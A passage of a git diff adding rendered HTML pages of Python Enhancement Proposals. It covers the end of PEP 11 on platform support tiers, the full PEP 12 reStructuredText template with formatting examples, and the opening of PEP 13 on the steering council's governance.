Tier 2

+
    +
  • STATUS
  • +
  • Must have a reliable buildbot.
  • +
  • At least two core developers are signed up to support the platform.
  • +
  • Changes which break any of these platforms are to be fixed or +reverted within 24 hours.
  • +
  • Failures on these platforms block a release.
  • +
+ + + + + + + + + + + + + + + + + + + + + +
Target TripleNotesContacts
aarch64-unknown-linux-gnuglibc, gcc

glibc, clang

+
Petr Viktorin, Victor Stinner

Victor Stinner, Gregory P. Smith

+
wasm32-unknown-wasip1WASI SDK, WasmtimeBrett Cannon, Eric Snow
x86_64-unknown-linux-gnuglibc, clangVictor Stinner, Gregory P. Smith
+
+
+

Tier 3

+
    +
  • STATUS
  • +
  • Must have a reliable buildbot.
  • +
  • At least one core developer is signed up to support the platform.
  • +
  • No response SLA to failures.
  • +
  • Failures on these platforms do not block a release.
  • +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Target TripleNotesContacts
aarch64-linux-androidRussell Keith-Magee, Petr Viktorin
aarch64-pc-windows-msvcSteve Dower
arm64-apple-iosiOS on deviceRussell Keith-Magee, Ned Deily
arm64-apple-ios-simulatoriOS on M1 macOS simulatorRussell Keith-Magee, Ned Deily
armv7l-unknown-linux-gnueabihfRaspberry Pi OS, glibc, gccGregory P. Smith
powerpc64le-unknown-linux-gnuglibc, clang

glibc, gcc

+
Victor Stinner

Victor Stinner

+
s390x-unknown-linux-gnuglibc, gccVictor Stinner
x86_64-linux-androidRussell Keith-Magee, Petr Viktorin
x86_64-unknown-freebsdBSD libc, clangVictor Stinner
+
+
+

All other platforms

+

Support for a platform may be partial within the code base, such as +from active development around platform support or accidentally. +Code changes to platforms not listed in the above tiers may be rejected +or removed from the code base without a deprecation process if they +cause a maintenance burden or obstruct general improvements.

+

Platforms not listed here may be supported by the wider Python +community in some way. If your desired platform is not listed above, +please perform a search online to see if someone is already providing +support in some form.

+
+
+

Notes

+
+

Microsoft Windows

+

Windows versions prior to Windows 10 follow Microsoft’s Fixed Lifecycle Policy, +with a mainstream support phase for 5 years after release, +where the product is generally commercially available, +and an additional 5 year extended support phase, +where paid support is still available and certain bug fixes are released. +Extended Security Updates (ESU) +is a paid program available to high-volume enterprise customers +as a “last resort” option to receive certain security updates after extended support ends. +ESU is considered a distinct phase that follows the expiration of extended support.

+

Windows 10 and later follow Microsoft’s Modern Lifecycle Policy, +which varies per-product, per-version, per-edition and per-channel. +Generally, feature updates (1709, 22H2) occur every 6-12 months +and are supported for 18-36 months; +Server and IoT editions, and LTSC channel releases are supported for 5-10 years, +and the latest feature release of a major version (Windows 10, Windows 11) +generally receives new updates for at least 10 years following release. +Microsoft’s Windows Lifecycle FAQ +has more specific and up-to-date guidance.

+

CPython’s Windows support currently follows Microsoft’s lifecycles. +A new feature release X.Y.0 will support all Windows versions +whose extended support phase has not yet expired. +Subsequent bug fix releases will support the same Windows versions +as the original feature release, even if no longer supported by Microsoft. +New versions of Windows released while CPython is in maintenance mode +may be supported at the discretion of the core team and release manager.

+

As of 2024, our current interpretation of Microsoft’s lifecycles is that +Windows for IoT and embedded systems is out of scope for new CPython releases, +as the intent of those is to avoid feature updates. Windows Server will usually +be the oldest version still receiving free security fixes, and that will +determine the earliest supported client release with equivalent API version +(which will usually be past its end-of-life).

+

Each feature release is built by a specific version of Microsoft +Visual Studio. That version should have mainstream support when the +release is made. Developers of extension modules will generally need +to use the same Visual Studio release; they are concerned both with +the availability of the versions they need to use, and with keeping +the zoo of versions small. The CPython source tree will keep +unmaintained build files for older Visual Studio releases, for which +patches will be accepted. Such build files will be removed from the +source tree 3 years after the extended support for the compiler has +ended (but continue to remain available in revision control).

+
+
+

Legacy C Locale

+

Starting with CPython 3.7.0, *nix platforms are expected to provide +at least one of C.UTF-8 (full locale), C.utf8 (full locale) or +UTF-8 (LC_CTYPE-only locale) as an alternative to the legacy C +locale.

+

Any Unicode-related integration problems that occur only in the legacy C +locale and cannot be reproduced in an appropriately configured non-ASCII +locale will be closed as “won’t fix”.

+
+
+
+
+

Unsupporting platforms

+

If a platform drops out of tiered support, a note must be posted +in this PEP that the platform is no longer actively supported. This +note must include:

+
    +
  • The name of the system,
  • +
  • The first release number that does not support this platform +anymore, and
  • +
  • The first release where the historical support code is actively +removed.
  • +
+

In some cases, it is not possible to identify the specific list of +systems for which some code is used (e.g. when autoconf tests for +absence of some feature which is considered present on all +supported systems). In this case, the name will give the precise +condition (usually a preprocessor symbol) that will become +unsupported.

+

At the same time, the CPython build must be changed to produce a +warning if somebody tries to install CPython on this platform. On +platforms using autoconf, configure should also be made emit a warning +about the unsupported platform.

+

This gives potential users of the platform a chance to step forward +and offer maintenance. We do not treat a platform that loses Tier 3 +support any worse than a platform that was never supported.

+
+
+

No-longer-supported platforms

+
    +
  • +
    Name: MS-DOS, MS-Windows 3.x
    +
    Unsupported in: Python 2.0
    +
    Code removed in: Python 2.1
    +
    +
  • +
  • +
    Name: SunOS 4
    +
    Unsupported in: Python 2.3
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: DYNIX
    +
    Unsupported in: Python 2.3
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: dgux
    +
    Unsupported in: Python 2.3
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: Minix
    +
    Unsupported in: Python 2.3
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: Irix 4 and –with-sgi-dl
    +
    Unsupported in: Python 2.3
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: Linux 1
    +
    Unsupported in: Python 2.3
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: Systems defining __d6_pthread_create (configure.in)
    +
    Unsupported in: Python 2.3
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: Systems defining PY_PTHREAD_D4, PY_PTHREAD_D6, +or PY_PTHREAD_D7 in thread_pthread.h
    +
    Unsupported in: Python 2.3
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: Systems using –with-dl-dld
    +
    Unsupported in: Python 2.3
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: Systems using –without-universal-newlines,
    +
    Unsupported in: Python 2.3
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: MacOS 9
    +
    Unsupported in: Python 2.4
    +
    Code removed in: Python 2.4
    +
    +
  • +
  • +
    Name: Systems using –with-wctype-functions
    +
    Unsupported in: Python 2.6
    +
    Code removed in: Python 2.6
    +
    +
  • +
  • +
    Name: Win9x, WinME, NT4
    +
    Unsupported in: Python 2.6 (warning in 2.5 installer)
    +
    Code removed in: Python 2.6
    +
    +
  • +
  • +
    Name: AtheOS
    +
    Unsupported in: Python 2.6 (with “AtheOS” changed to “Syllable”)
    +
    Build broken in: Python 2.7 (edit configure to re-enable)
    +
    Code removed in: Python 3.0
    + +
    +
  • +
  • +
    Name: BeOS
    +
    Unsupported in: Python 2.6 (warning in configure)
    +
    Build broken in: Python 2.7 (edit configure to re-enable)
    +
    Code removed in: Python 3.0
    +
    +
  • +
  • +
    Name: Systems using Mach C Threads
    +
    Unsupported in: Python 3.2
    +
    Code removed in: Python 3.3
    +
    +
  • +
  • +
    Name: SunOS lightweight processes (LWP)
    +
    Unsupported in: Python 3.2
    +
    Code removed in: Python 3.3
    +
    +
  • +
  • +
    Name: Systems using –with-pth (GNU pth threads)
    +
    Unsupported in: Python 3.2
    +
    Code removed in: Python 3.3
    +
    +
  • +
  • +
    Name: Systems using Irix threads
    +
    Unsupported in: Python 3.2
    +
    Code removed in: Python 3.3
    +
    +
  • +
  • +
    Name: OSF* systems (issue 8606)
    +
    Unsupported in: Python 3.2
    +
    Code removed in: Python 3.3
    +
    +
  • +
  • +
    Name: OS/2 (issue 16135)
    +
    Unsupported in: Python 3.3
    +
    Code removed in: Python 3.4
    +
    +
  • +
  • +
    Name: VMS (issue 16136)
    +
    Unsupported in: Python 3.3
    +
    Code removed in: Python 3.4
    +
    +
  • +
  • +
    Name: Windows 2000
    +
    Unsupported in: Python 3.3
    +
    Code removed in: Python 3.4
    +
    +
  • +
  • +
    Name: Windows systems where COMSPEC points to command.com
    +
    Unsupported in: Python 3.3
    +
    Code removed in: Python 3.4
    +
    +
  • +
  • +
    Name: RISC OS
    +
    Unsupported in: Python 3.0 (some code actually removed)
    +
    Code removed in: Python 3.4
    +
    +
  • +
  • +
    Name: IRIX
    +
    Unsupported in: Python 3.7
    +
    Code removed in: Python 3.7
    +
    +
  • +
  • +
    Name: Systems without multithreading support
    +
    Unsupported in: Python 3.7
    +
    Code removed in: Python 3.7
    +
    +
  • +
  • +
    Name: wasm32-unknown-emscripten
    +
    Unsupported in: Python 3.13
    +
    Code removed in: Unknown
    +
    +
  • +
+
+
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0011.rst

+

Last modified: 2024-11-07 21:53:03 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0012/index.html b/pep-0012/index.html new file mode 100644 index 00000000000..7ded9e06125 --- /dev/null +++ b/pep-0012/index.html @@ -0,0 +1,964 @@ + + + + + + + + PEP 12 – Sample reStructuredText PEP Template | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 12 – Sample reStructuredText PEP Template

+
+
Author:
+
David Goodger <goodger at python.org>, +Barry Warsaw <barry at python.org>, +Brett Cannon <brett at python.org>
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
05-Aug-2002
+
Post-History:
+
30-Aug-2002
+
+
+
+
Table of Contents +
+
+

Note

+

For those who have written a PEP before, there is a template +(which is included as a file in the PEPs repository).

+
+
+

Abstract

+

This PEP provides a boilerplate or sample template for creating your +own reStructuredText PEPs. In conjunction with the content guidelines +in PEP 1, this should make it easy for you to conform your own +PEPs to the format outlined below.

+

Note: if you are reading this PEP via the web, you should first grab +the text (reStructuredText) source of this PEP in order to complete +the steps below. DO NOT USE THE HTML FILE AS YOUR TEMPLATE!

+

The source for this (or any) PEP can be found in the +PEPs repository, +as well as via a link at the bottom of each PEP.

+
+
+

Rationale

+

If you intend to submit a PEP, you MUST use this template, in +conjunction with the format guidelines below, to ensure that your PEP +submission won’t get automatically rejected because of form.

+

ReStructuredText provides PEP authors with useful functionality and +expressivity, while maintaining easy readability in the source text. +The processed HTML form makes the functionality accessible to readers: +live hyperlinks, styled text, tables, images, and automatic tables of +contents, among other advantages.

+
+
+

How to Use This Template

+

To use this template you must first decide whether your PEP is going +to be an Informational or Standards Track PEP. Most PEPs are +Standards Track because they propose a new feature for the Python +language or standard library. When in doubt, read PEP 1 for details, +or open a tracker issue on the PEPs repo to ask for assistance.

+

Once you’ve decided which type of PEP yours is going to be, follow the +directions below.

+
    +
  • Make a copy of this file (the .rst file, not the HTML!) and +perform the following edits. Name the new file pep-NNNN.rst, using +the next available number (not used by a published or in-PR PEP).
  • +
  • Replace the “PEP: 12” header with “PEP: NNNN”, +matching the file name. Note that the file name should be padded with +zeros (eg pep-0012.rst), but the header should not (PEP: 12).
  • +
  • Change the Title header to the title of your PEP.
  • +
  • Change the Author header to include your name, and optionally your +email address. Be sure to follow the format carefully: your name +must appear first, and it must not be contained in parentheses. +Your email address may appear second (or it can be omitted) and if +it appears, it must appear in angle brackets. It is okay to +obfuscate your email address.
  • +
  • If none of the authors are Python core developers, include a Sponsor +header with the name of the core developer sponsoring your PEP.
  • +
  • Add the direct URL of the PEP’s canonical discussion thread +(on e.g. Python-Dev, Discourse, etc) under the Discussions-To header. +If the thread will be created after the PEP is submitted as an official +draft, it is okay to just list the venue name initially, but remember to +update the PEP with the URL as soon as the PEP is successfully merged +to the PEPs repository and you create the corresponding discussion thread. +See PEP 1 for more details.
  • +
  • Change the Status header to “Draft”.
  • +
  • For Standards Track PEPs, change the Type header to “Standards +Track”.
  • +
  • For Informational PEPs, change the Type header to “Informational”.
  • +
  • For Standards Track PEPs, if your feature depends on the acceptance +of some other currently in-development PEP, add a Requires header +right after the Type header. The value should be the PEP number of +the PEP yours depends on. Don’t add this header if your dependent +feature is described in a Final PEP.
  • +
  • Change the Created header to today’s date. Be sure to follow the +format carefully: it must be in dd-mmm-yyyy format, where the +mmm is the 3 English letter month abbreviation, i.e. one of Jan, +Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec.
  • +
  • For Standards Track PEPs, after the Created header, add a +Python-Version header and set the value to the next planned version +of Python, i.e. the one your new feature will hopefully make its +first appearance in. Do not use an alpha or beta release +designation here. Thus, if the last version of Python was 2.2 alpha +1 and you’re hoping to get your new feature into Python 2.2, set the +header to:
    Python-Version: 2.2
    +
    +
    +
  • +
  • Add a Topic header if the PEP belongs under one shown at the Topic Index. +Most PEPs don’t.
  • +
  • Leave Post-History alone for now; you’ll add dates and corresponding links +to this header each time you post your PEP to the designated discussion forum +(and update the Discussions-To header with said link, as above). +For each thread, use the date (in the dd-mmm-yyy format) as the +linked text, and insert the URLs inline as anonymous reST hyperlinks, +with commas in between each posting.

    If you posted threads for your PEP on August 14, 2001 and September 3, 2001, +the Post-History header would look like, e.g.:

    +
    Post-History: `14-Aug-2001 <https://www.example.com/thread_1>`__,
    +              `03-Sept-2001 <https://www.example.com/thread_2>`__
    +
    +
    +

    You should add the new dates/links here as soon as you post a +new discussion thread.

    +
  • +
  • Add a Replaces header if your PEP obsoletes an earlier PEP. The +value of this header is the number of the PEP that your new PEP is +replacing. Only add this header if the older PEP is in “final” +form, i.e. is either Accepted, Final, or Rejected. You aren’t +replacing an older open PEP if you’re submitting a competing idea.
  • +
  • Now write your Abstract, Rationale, and other content for your PEP, +replacing all this gobbledygook with your own text. Be sure to +adhere to the format guidelines below, specifically on the +prohibition of tab characters and the indentation requirements. +See “Suggested Sections” below for a template of sections to include.
  • +
  • Update your Footnotes section, listing any footnotes and +non-inline link targets referenced by the text.
  • +
  • Run ./build.py to ensure the PEP is rendered without errors, +and check that the output in build/pep-NNNN.html looks as you intend.
  • +
  • Create a pull request against the PEPs repository.
  • +
+

For reference, here are all of the possible header fields (everything +in brackets should either be replaced or have the field removed if +it has a leading * marking it as optional and it does not apply to +your PEP):

+
PEP: [NNN]
+Title: [...]
+Author: [Full Name <email at example.com>]
+Sponsor: *[Full Name <email at example.com>]
+PEP-Delegate:
+Discussions-To: [URL]
+Status: Draft
+Type: [Standards Track | Informational | Process]
+Topic: *[Governance | Packaging | Release | Typing]
+Requires: *[NNN]
+Created: [DD-MMM-YYYY]
+Python-Version: *[M.N]
+Post-History: [`DD-MMM-YYYY <URL>`__]
+Replaces: *[NNN]
+Superseded-By: *[NNN]
+Resolution:
+
+
+
+
+

ReStructuredText PEP Formatting Requirements

+

The following is a PEP-specific summary of reStructuredText syntax. +For the sake of simplicity and brevity, much detail is omitted. For +more detail, see Resources below. Literal blocks (in which no +markup processing is done) are used for examples throughout, to +illustrate the plaintext markup.

+
+

General

+

Lines should usually not extend past column 79, +excepting URLs and similar circumstances. +Tab characters must never appear in the document at all.

+
+
+

Section Headings

+

PEP headings must begin in column zero and the initial letter of each +word must be capitalized as in book titles. Acronyms should be in all +capitals. Section titles must be adorned with an underline, a single +repeated punctuation character, which begins in column zero and must +extend at least as far as the right edge of the title text (4 +characters minimum). First-level section titles are underlined with +“=” (equals signs), second-level section titles with “-” (hyphens), +and third-level section titles with “’” (single quotes or +apostrophes). For example:

+
First-Level Title
+=================
+
+Second-Level Title
+------------------
+
+Third-Level Title
+'''''''''''''''''
+
+
+

If there are more than three levels of sections in your PEP, you may +insert overline/underline-adorned titles for the first and second +levels as follows:

+
============================
+First-Level Title (optional)
+============================
+
+-----------------------------
+Second-Level Title (optional)
+-----------------------------
+
+Third-Level Title
+=================
+
+Fourth-Level Title
+------------------
+
+Fifth-Level Title
+'''''''''''''''''
+
+
+

You shouldn’t have more than five levels of sections in your PEP. If +you do, you should consider rewriting it.

+

You must use two blank lines between the last line of a section’s body +and the next section heading. If a subsection heading immediately +follows a section heading, a single blank line in-between is +sufficient.

+

The body of each section is not normally indented, although some +constructs do use indentation, as described below. Blank lines are +used to separate constructs.

+
+
+

Paragraphs

+

Paragraphs are left-aligned text blocks separated by blank lines. +Paragraphs are not indented unless they are part of an indented +construct (such as a block quote or a list item).

+
+
+

Inline Markup

+

Portions of text within paragraphs and other text blocks may be +styled. For example:

+
Text may be marked as *emphasized* (single asterisk markup,
+typically shown in italics) or **strongly emphasized** (double
+asterisks, typically boldface).  ``Inline literals`` (using double
+backquotes) are typically rendered in a monospaced typeface.  No
+further markup recognition is done within the double backquotes,
+so they're safe for any kind of code snippets.
+
+
+
+
+

Block Quotes

+

Block quotes consist of indented body elements. For example:

+
This is a paragraph.
+
+    This is a block quote.
+
+    A block quote may contain many paragraphs.
+
+
+

Block quotes are used to quote extended passages from other sources. +Block quotes may be nested inside other body elements. Use 4 spaces +per indent level.

+
+
+

Literal Blocks

+

Literal blocks are used for code samples and other preformatted text. +To indicate a literal block, preface the indented text block with +“::” (two colons), or use the .. code-block:: directive. +Indent the text block by 4 spaces; the literal block continues until the end +of the indentation. For example:

+
This is a typical paragraph.  A literal block follows.
+
+::
+
+    for a in [5, 4, 3, 2, 1]:  # this is program code, shown as-is
+        print(a)
+    print("it's...")
+
+
+

::” is also recognized at the end of any paragraph; if not immediately +preceded by whitespace, one colon will remain visible in the final output:

+
This is an example::
+
+    Literal block
+
+
+

By default, literal blocks will be syntax-highlighted as Python code. +For specific blocks that contain code or data in other languages/formats, +use the .. code-block:: language directive, substituting the “short name” +of the appropriate Pygments lexer +(or text to disable highlighting) for language. For example:

+
.. code-block:: rst
+
+    An example of the ``rst`` lexer (i.e. *reStructuredText*).
+
+
+

For PEPs that predominantly contain literal blocks of a specific language, +use the .. highlight:: language directive with the appropriate language +at the top of the PEP body (below the headers and above the Abstract). +All literal blocks will then be treated as that language, +unless specified otherwise in the specific .. code-block. For example:

+
.. highlight:: c
+
+Abstract
+========
+
+Here's some C code::
+
+    printf("Hello, World!\n");
+
+
+
+
+

Lists

+

Bullet list items begin with one of “-”, “*”, or “+” (hyphen, +asterisk, or plus sign), followed by whitespace and the list item +body. List item bodies must be left-aligned and indented relative to +the bullet; the text immediately after the bullet determines the +indentation. For example:

+
This paragraph is followed by a list.
+
+* This is the first bullet list item.  The blank line above the
+  first list item is required; blank lines between list items
+  (such as below this paragraph) are optional.
+
+* This is the first paragraph in the second item in the list.
+
+  This is the second paragraph in the second item in the list.
+  The blank line above this paragraph is required.  The left edge
+  of this paragraph lines up with the paragraph above, both
+  indented relative to the bullet.
+
+  - This is a sublist.  The bullet lines up with the left edge of
+    the text blocks above.  A sublist is a new list so requires a
+    blank line above and below.
+
+* This is the third item of the main list.
+
+This paragraph is not part of the list.
+
+
+

Enumerated (numbered) list items are similar, but use an enumerator +instead of a bullet. Enumerators are numbers (1, 2, 3, …), letters +(A, B, C, …; uppercase or lowercase), or Roman numerals (i, ii, iii, +iv, …; uppercase or lowercase), formatted with a period suffix +(“1.”, “2.”), parentheses (“(1)”, “(2)”), or a right-parenthesis +suffix (“1)”, “2)”). For example:

+
1. As with bullet list items, the left edge of paragraphs must
+   align.
+
+2. Each list item may contain multiple paragraphs, sublists, etc.
+
+   This is the second paragraph of the second list item.
+
+   a) Enumerated lists may be nested.
+   b) Blank lines may be omitted between list items.
+
+
+

Definition lists are written like this:

+
what
+    Definition lists associate a term with a definition.
+
+how
+    The term is a one-line phrase, and the definition is one
+    or more paragraphs or body elements, indented relative to
+    the term.
+
+
+
+
+

Tables

+

Simple tables are easy and compact:

+
=====  =====  =======
+  A      B    A and B
+=====  =====  =======
+False  False  False
+True   False  False
+False  True   False
+True   True   True
+=====  =====  =======
+
+
+

There must be at least two columns in a table (to differentiate from +section titles). Column spans use underlines of hyphens (“Inputs” +spans the first two columns):

+
=====  =====  ======
+   Inputs     Output
+------------  ------
+  A      B    A or B
+=====  =====  ======
+False  False  False
+True   False  True
+False  True   True
+True   True   True
+=====  =====  ======
+
+
+

Text in a first-column cell starts a new row. No text in the first +column indicates a continuation line; the rest of the cells may +consist of multiple lines. For example:

+
=====  =========================
+col 1  col 2
+=====  =========================
+1      Second column of row 1.
+2      Second column of row 2.
+       Second line of paragraph.
+3      - Second column of row 3.
+
+       - Second item in bullet
+         list (row 3, column 2).
+=====  =========================
+
+
+
+ + +
+

Footnotes

+

Footnote references consist of a left square bracket, a label, a +right square bracket, and a trailing underscore. +Instead of a number, use a label of the +form “#word”, where “word” is a mnemonic consisting of alphanumerics +plus internal hyphens, underscores, and periods (no whitespace or +other characters are allowed). +For example:

+
Refer to The TeXbook [#TeXbook]_ for more information.
+
+
+

which renders as

+
+
Refer to The TeXbook [1] for more information.
+

Whitespace must precede the footnote reference. Leave a space between +the footnote reference and the preceding word.

+

Use footnotes for additional notes, explanations and caveats, as well as +for references to books and other sources not readily available online. +Native reST hyperlink targets or inline hyperlinks in the text should be +used in preference to footnotes for including URLs to online resources.

+

Footnotes begin with “.. “ (the explicit +markup start), followed by the footnote marker (no underscores), +followed by the footnote body. For example:

+
.. [#TeXbook] Donald Knuth's *The TeXbook*, pages 195 and 196.
+
+
+

which renders as

+
+
+
+

Footnotes and footnote references will be numbered automatically, and +the numbers will always match.

+
+
+

Images

+

If your PEP contains a diagram or other graphic, you may include it in the +processed output using the image directive:

+
.. image:: diagram.png
+
+
+

Any browser-friendly graphics format is possible; PNG should be +preferred for graphics, JPEG for photos and GIF for animations. +Currently, SVG must be avoided due to compatibility issues with the +PEP build system.

+

For accessibility and readers of the source text, you should include +a description of the image and any key information contained within +using the :alt: option to the image directive:

+
.. image:: dataflow.png
+   :alt: Data flows from the input module, through the "black box"
+         module, and finally into (and through) the output module.
+
+
+
+
+

Comments

+

A comment is an indented block of arbitrary text immediately +following an explicit markup start: two periods and whitespace. Leave +the “..” on a line by itself to ensure that the comment is not +misinterpreted as another explicit markup construct. Comments are not +visible in the processed document. For example:

+
..
+   This section should be updated in the final PEP.
+   Ensure the date is accurate.
+
+
+
+
+

Escaping Mechanism

+

reStructuredText uses backslashes (”\”) to override the special +meaning given to markup characters and get the literal characters +themselves. To get a literal backslash, use an escaped backslash +(”\\”). There are two contexts in which backslashes have no +special meaning: literal blocks and inline literals (see Inline +Markup above). In these contexts, no markup recognition is done, +and a single backslash represents a literal backslash, without having +to double up.

+

If you find that you need to use a backslash in your text, consider +using inline literals or a literal block instead.

+
+
+

Intersphinx

+

You can use +Intersphinx references +to other Sphinx sites, +such as the Python documentation +packaging.python.org, +and typing.readthedocs.io, +to easily cross-reference pages, sections and Python/C objects.

+

For example, +to create a link pointing to a section of the typing docs, +you would write the following:

+
:ref:`type expression <typing:type-expression>`
+
+
+
+
+

Canonical Documentation

+

As PEP 1 describes, +PEPs are considered historical documents once marked Final, +and their canonical documentation/specification should be moved elsewhere. +To indicate this, use the canonical-doc directive +or an appropriate subclass:

+
    +
  • canonical-pypa-spec for packaging standards
  • +
  • canonical-typing-spec for typing standards
  • +
+

Add the directive between the headers and the first section of the PEP +(typically the Abstract) +and pass as an argument an Intersphinx reference of the canonical doc/spec +(or if the target is not on a Sphinx site, a reST hyperlink).

+

For example, +to create a banner pointing to the sqlite3 docs, +you would write the following:

+
.. canonical-doc:: :mod:`python:sqlite3`
+
+
+

which would generate the banner:

+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at sqlite3.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Or for a PyPA spec, +such as the Core metadata specifications, +you would use:

+
.. canonical-pypa-spec:: :ref:`packaging:core-metadata`
+
+
+

which renders as:

+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

For a typing PEP that introduces no new runtime objects, +you might use something like the first one of these; +for a typing PEP that introduces a new object to the typing module at runtime, +you might use the second:

+
.. canonical-typing-spec:: :ref:`typing:packaging-typed-libraries`
+.. canonical-typing-spec:: :ref:`typing:literal-types` and
+                           :py:data:`typing.Literal`
+
+
+

The two render as:

+
+
+

Attention

+

This PEP is a historical document: see Type information in libraries for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Attention

+

This PEP is a historical document: see Literals and +typing.Literal for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

The argument accepts arbitrary reST, +so you can include multiple linked docs/specs and name them whatever you like, +and you can also include directive content that will be inserted into the text. +The following advanced example:

+
.. canonical-doc:: the :ref:`python:sqlite3-connection-objects` and :exc:`python:~sqlite3.DataError` docs
+
+    Also, see the :ref:`Data Persistence docs <persistence>` for other examples.
+
+
+

would render as:

+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at the Connection objects and sqlite3.DataError docs.

+

×

+

Also, see the Data Persistence docs for other examples.

+

See PEP 1 for how to propose changes.

+
+
+
+
+
+

Habits to Avoid

+

Many programmers who are familiar with TeX often write quotation marks +like this:

+
`single-quoted' or ``double-quoted''
+
+
+

Backquotes are significant in reStructuredText, so this practice +should be avoided. For ordinary text, use ordinary ‘single-quotes’ or +“double-quotes”. For inline literal text (see Inline Markup +above), use double-backquotes:

+
``literal text: in here, anything goes!``
+
+
+
+
+

Suggested Sections

+

Various sections are found to be common across PEPs and are outlined in +PEP 1. Those sections are provided here for convenience.

+
PEP: <REQUIRED: pep number>
+Title: <REQUIRED: pep title>
+Author: <REQUIRED: list of authors' names and optionally, email addrs>
+Sponsor: <name of sponsor>
+PEP-Delegate: <PEP delegate's name>
+Discussions-To: <REQUIRED: URL of current canonical discussion thread>
+Status: <REQUIRED: Draft | Active | Accepted | Provisional | Deferred | Rejected | Withdrawn | Final | Superseded>
+Type: <REQUIRED: Standards Track | Informational | Process>
+Topic: <Governance | Packaging | Release | Typing>
+Requires: <pep numbers>
+Created: <date created on, in dd-mmm-yyyy format>
+Python-Version: <version number>
+Post-History: <REQUIRED: dates, in dd-mmm-yyyy format, and corresponding links to PEP discussion threads>
+Replaces: <pep number>
+Superseded-By: <pep number>
+Resolution: <url>
+
+
+Abstract
+========
+
+[A short (~200 word) description of the technical issue being addressed.]
+
+
+Motivation
+==========
+
+[Clearly explain why the existing language specification is inadequate to address the problem that the PEP solves.]
+
+
+Rationale
+=========
+
+[Describe why particular design decisions were made.]
+
+
+Specification
+=============
+
+[Describe the syntax and semantics of any new language feature.]
+
+
+Backwards Compatibility
+=======================
+
+[Describe potential impact and severity on pre-existing code.]
+
+
+Security Implications
+=====================
+
+[How could a malicious user take advantage of this new feature?]
+
+
+How to Teach This
+=================
+
+[How to teach users, new and experienced, how to apply the PEP to their work.]
+
+
+Reference Implementation
+========================
+
+[Link to any existing implementation and details about its state, e.g. proof-of-concept.]
+
+
+Rejected Ideas
+==============
+
+[Why certain ideas that were brought while discussing this PEP were not ultimately pursued.]
+
+
+Open Issues
+===========
+
+[Any points that are still being decided/discussed.]
+
+
+Footnotes
+=========
+
+[A collection of footnotes cited in the PEP, and a place to list non-inline hyperlink targets.]
+
+
+Copyright
+=========
+
+This document is placed in the public domain or under the
+CC0-1.0-Universal license, whichever is more permissive.
+
+
+
+
+

Resources

+

Many other constructs and variations are possible, +both those supported by basic Docutils +and the extensions added by Sphinx.

+

A number of resources are available to learn more about them:

+ +

If you have questions or require assistance with writing a PEP that the above +resources don’t address, ping @python/pep-editors on GitHub, open an +issue on the PEPs repository +or reach out to a PEP editor directly.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0012.rst

+

Last modified: 2024-06-14 23:31:40 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0013/index.html b/pep-0013/index.html new file mode 100644 index 00000000000..b977e1c620f --- /dev/null +++ b/pep-0013/index.html @@ -0,0 +1,491 @@ + + + + + + + + PEP 13 – Python Language Governance | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 13 – Python Language Governance

+
+
Author:
+
The Python core team and community
+
Status:
+
Active
+
Type:
+
Process
+
Topic:
+
Governance
+
Created:
+
16-Dec-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP defines the formal governance process for Python, and records +how this has changed over time. Currently, governance is based around +a steering council. The council has broad authority, which they seek +to exercise as rarely as possible.

+
+
+

Current steering council

+

The 2025 term steering council consists of:

+
    +
  • Barry Warsaw
  • +
  • Donghee Na
  • +
  • Emily Morehouse
  • +
  • Gregory P. Smith
  • +
  • Pablo Galindo Salgado
  • +
+

Per the results of the vote tracked in PEP 8106.

+

The core team consists of those listed in the private +https://github.com/python/voters/ repository which is publicly +shared via https://devguide.python.org/developers/.

+
+
+

Specification

+
+

The steering council

+
+

Composition

+

The steering council is a 5-person committee.

+
+
+

Mandate

+

The steering council shall work to:

+
    +
  • Maintain the quality and stability of the Python language and +CPython interpreter,
  • +
  • Make contributing as accessible, inclusive, and sustainable as +possible,
  • +
  • Formalize and maintain the relationship between the core team and +the PSF,
  • +
  • Establish appropriate decision-making processes for PEPs,
  • +
  • Seek consensus among contributors and the core team before acting in +a formal capacity,
  • +
  • Act as a “court of final appeal” for decisions where all other +methods have failed.
  • +
+
+
+

Powers

+

The council has broad authority to make decisions about the project. +For example, they can:

+
    +
  • Accept or reject PEPs
  • +
